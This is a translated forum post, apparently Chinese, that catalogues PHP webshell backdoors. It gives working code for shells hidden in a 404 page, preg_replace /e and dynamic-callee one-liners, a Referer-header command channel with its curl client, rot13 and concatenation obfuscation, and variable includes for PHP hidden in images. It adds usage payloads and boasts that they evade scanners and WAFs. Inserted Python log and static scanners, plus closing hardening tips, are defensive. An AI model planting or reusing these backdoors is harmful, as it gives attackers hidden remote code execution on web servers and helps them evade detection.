We look at these PHP backdoor programs with a learning mindset; a lot of PHP backdoor code shows just how much thought their authors have put into them.
Powerful one-sentence PHP backdoors
This kind of backdoor is a real headache for website and server administrators: detection methods have to change all the time, and many new writing techniques cannot be discovered or handled by ordinary detection methods.
Today we go through some interesting PHP Trojans.
1. Hiding a PHP Trojan in the 404 page:
[mw_shl_code=php,true]<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e", $_POST['error'], "saft");
header('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
The 404 page is a common file on any website, and few people check or modify it once it is in place, so it is a convenient place to hide a backdoor.
2. A signature-free hidden one-sentence PHP backdoor:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode'] && preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))', 'a');
?>[/mw_shl_code]
It assigns $_POST['code'] to $_SESSION['theCode'] and then executes $_SESSION['theCode']; the highlight is that there is no signature string anywhere in the code.
If you check the code with a scanning tool, it will not raise an alarm, which achieves the goal.
3. Super Stealthy PHP Backdoor:
[mw_shl_code=php,true]<?php $_GET[a]($_GET); ?>[/mw_shl_code]
A single function call driven entirely by $_GET is enough to constitute a Trojan;
How to use:
[mw_shl_code=php,true] ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
After execution, a one-sentence Trojan c.php is generated in the current directory. When parameter a is eval, an error is raised and the Trojan is not generated; when it is assert, an error is also reported, but the Trojan is still generated, which should not be underestimated.
A backdoor that runs code passed in the request's Referer header:
This method is implemented with two files. File 1 (1.php):
[mw_shl_code=php,true]<?php
// 1.php
header('Content-type:text/html; charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '10' && count($a) == 9) {
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
File 2 (2.php):
[mw_shl_code=php,true]<?php
// 2.php
header('Content-type:text/html; charset=utf-8');
// code to execute
$code = <<<CODE
phpinfo();
CODE;
// base64-encode it
$code = base64_encode($code);
// build the referer string
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
// backdoor url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
?>[/mw_shl_code]
The backdoor runs base64-encoded code carried in the HTTP_REFERER header of the request.
The same idea works well for bypassing a WAF.
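As an added, defender-side example that is not part of the original post: a small Python check over web server access logs (combined format) that flags requests whose Referer is a bare query string rather than a URL, carries unusually many parameters, or contains base64-looking values, which is exactly the trace the 1.php/2.php pair above leaves behind. The log lines are constructed and the thresholds are heuristics for triage, not proof of compromise.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format: client ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
B64_RE = re.compile(r"^[A-Za-z0-9+/ ]{12,}={0,2}$")  # ' ' allowed: 1.php turns it back into '+'

def referer_findings(referer, max_params=6):
    """Reasons why a Referer value looks like a smuggled command channel; [] if none."""
    reasons = []
    if referer in ("", "-"):
        return reasons
    if referer.lower().startswith(("http://", "https://")):
        query = urlsplit(referer).query      # a real URL: only its query string matters
    else:
        query = referer                      # bare key=value&... is not a referring page
        reasons.append("referer is not a URL")
    params = parse_qsl(query, keep_blank_values=True)
    if len(params) > max_params:
        reasons.append("%d query parameters in referer" % len(params))
    for key, value in params:
        if B64_RE.match(value):
            reasons.append("base64-looking value in parameter %r" % key)
    return reasons

def suspicious_requests(lines):
    """Parse combined-format lines; return (ip, path, reasons) for flagged requests."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # not combined format, or a truncated line
        reasons = referer_findings(m.group("referer"))
        if reasons:
            path = m.group("req").split(" ")[1] if " " in m.group("req") else m.group("req")
            out.append((m.group("ip"), path, reasons))
    return out

# Constructed sample lines (not real traffic); the second carries the a=10&...&i= layout
# that 1.php expects, with base64("phpinfo();") in parameter g.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120 '
    '"https://example.org/start.html" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /test1/1.php HTTP/1.1" 200 73 '
    '"a=10&b=ab&c=34&d=re&e=32&f=km&g=cGhwaW5mbygpOw==&h=&i=" "curl/8.4.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /img/logo.png HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
]
```

Running `suspicious_requests(SAMPLE_LOG)` flags only the second line, with all three reasons attached.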
4. PHP backdoor generator tool: weevely
weevely is a free PHP-specific one-sentence webshell tool that can simulate a telnet-like connected shell. Weevely is typically used for web application post-exploitation, for hiding backdoors, or as a telnet-like replacement for web-page-based management. The server-side PHP code generated by Weevely is base64 encoded, so it can deceive mainstream antivirus software and IDS; once you upload the server-side code, you can usually run it directly through Weevely.
The functions used in the backdoor are ordinary string-processing functions, and functions such as eval and system that serve as inspection rules do not appear directly in the code, so the backdoor file bypasses the check of backdoor search tools. Scanning with the Darkgroup (暗组) web backdoor detection tool reports the file as not a threat.
The above is just a general introduction; usage details are not covered here, as this is only a popular-science overview.
4. Three mutated one-sentence PHP Trojans. The first:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1]); ?>[/mw_shl_code]
The second:
[mw_shl_code=php,true]<?php
$_ = "";
$_[+""] = '';
$_ = "$_"."";
$_ = ($_[+""]|" ").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']); ?>[/mw_shl_code]
In the "kitchen knife" (菜刀) client, enter http://site/2.php?_=assert&__=eval($_POST['pass']) with the password pass.
Using the client's additional-data feature makes it even better hidden, or you can use other injection tools, because everything is submitted via POST.
The third:
[mw_shl_code=php,true]<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add'); ?>[/mw_shl_code]
str_rot13('riny') is eval in rot13 form: the keyword is avoided completely without losing the effect, enough to make you spit blood!
5. Finally, a few advanced PHP Trojan backdoors:
1、
[mw_shl_code=php,true]<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e", $_POST['h'], "Access");
?>[/mw_shl_code]
// one-sentence shell for the "kitchen knife" client
2、
[mw_shl_code=php,true]<?php
$filename = $_GET['xbid'];
include($filename);
?>[/mw_shl_code]
// dangerous include function: any file is compiled and run as PHP
3、
[mw_shl_code=php,true]<?php
$reg = "c"."o"."p"."y";
$reg($_FILES['MyFile']['tmp_name'], $_FILES['MyFile']['name']);
?>[/mw_shl_code]
// rename any file
4、
[mw_shl_code=php,true]<?php
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e", $_POST['h'], "Access");
?>[/mw_shl_code]
// one-sentence shell for the "kitchen knife" client
5、
[mw_shl_code=php,true]<?php
include($uid);
?>[/mw_shl_code]
// dangerous include function: any file is compiled and run as PHP; POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif[/mw_shl_code]
// a one-sentence shell inserted into the gif
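An added example, not from the original post: a small Python static scanner for the patterns this post has shown (preg_replace with /e, a variable used as the function name and fed a superglobal, include of a variable, eval/assert wrapped around a decoder, function names glued from single characters, and str_rot13 literals that decode to a dangerous name), run over constructed fixtures modelled on the snippets above plus one benign file. The rule names and regexes are my own, and a hit is a triage lead for manual review, not proof of compromise.

```python
import re
import codecs

# Fragments shared by the rules: decoder names and the shapes a variable callee takes
# ($f(...), $_GET[a](...), ${'_'.$_}['_'](...)).
DECODERS = r"(?:base64_decode|str_rot13|gzinflate|gzuncompress|strrev)"
DYN_CALLEE = r"(?:\$\w+|\$\{[^}]*\})(?:\[[^\]]*\])*"
DANGEROUS = {"eval", "assert", "system", "exec", "passthru", "shell_exec", "preg_replace"}

RULES = {
    # preg_replace (or an alias held in a variable) called with the /e modifier
    "preg_replace_e": re.compile(r"(?:preg_replace|" + DYN_CALLEE + r")\s*\(\s*['\"]/[^'\"]*/\w*e\w*['\"]"),
    # a variable used as the function name and fed a superglobal or another dynamic value
    "dynamic_call_request_arg": re.compile(DYN_CALLEE + r"\s*\(\s*@?(?:\$_|\$\{)"),
    # include/require of a variable: whatever file it names is run as PHP
    "include_variable": re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$"),
    # eval/assert wrapped directly around a decoder
    "eval_of_decoder": re.compile(r"\b(?:eval|assert)\s*\(\s*" + DECODERS + r"\s*\("),
    # a name glued together from single-character literals ("p"."r"."e"...)
    "assembled_name": re.compile(r"(?:['\"]\w['\"]\s*\.\s*){3,}['\"]\w['\"]"),
}
ROT13_LITERAL = re.compile(r"str_rot13\s*\(\s*['\"](\w+)['\"]\s*\)")

def scan_php(source):
    """Return (rule, matched text) findings for one PHP source string; [] if clean."""
    findings = [(name, m.group(0)) for name, rx in RULES.items() for m in rx.finditer(source)]
    for m in ROT13_LITERAL.finditer(source):  # decode rot13 literals and test the result
        if codecs.decode(m.group(1), "rot13") in DANGEROUS:
            findings.append(("rot13_dangerous", m.group(0)))
    return findings

def triggered(source):
    """Sorted list of rule names that fired, convenient for triage and for tests."""
    return sorted({rule for rule, _ in scan_php(source)})

# Constructed fixtures modelled on the snippets in this post, plus one benign file.
SAMPLES = {
    "404_page": '<?php @preg_replace("/[pageerror]/e", $_POST["error"], "saft"); ?>',
    "get_callee": "<?php $_GET[a]($_GET); ?>",
    "assembled": '<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e", $_POST["h"], "Access"); ?>',
    "rot13": "<?php ($b = $_POST['b']) && @preg_replace('/ad/e', '@'.str_rot13('riny').'($b)', 'add'); ?>",
    "include": '<?php $filename = $_GET["xbid"]; include($filename); ?>',
    "benign": '<?php echo htmlspecialchars($_GET["q"] ?? ""); $path = "/var/www/images/"; ?>',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print("%-10s %s" % (name, ", ".join(triggered(src)) or "clean"))
```

For a real review, walk the web root and call `scan_php` on every .php file (and on files with other extensions in writable directories, since item 5 shows PHP hidden in a gif).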
To sum up, these PHP backdoors are pretty comprehensive; a moment of carelessness and you will definitely be caught out. So what is the real priority of today's article? The key points are in the summary below!
How to deal with one-sentence PHP backdoors: we stress a few key points. If you have read this far, I trust you are no layman, so I won't be long-winded:
- Be security-conscious when writing PHP programs
- Read the server log files regularly and back them up regularly
- Assign strict permissions to each site
- Carry out frequent batch security reviews of dynamic files and directories
- Learn how to do manual malware hunting: "behaviour-based investigation and removal"
- Keep following the topic, or hang out in an active cybersecurity community
- Even a single function can serve as a rule for tiered hardening of the server environment
We believe that when there are more sites to manage and a large amount of data, some auxiliary tools should reasonably be applied, but we should not rely on these tools completely. Technology is always being updated and improved; the most important thing is to learn and understand the thinking of the people who write these powerful backdoors, and that change of perspective can bring you greater progress.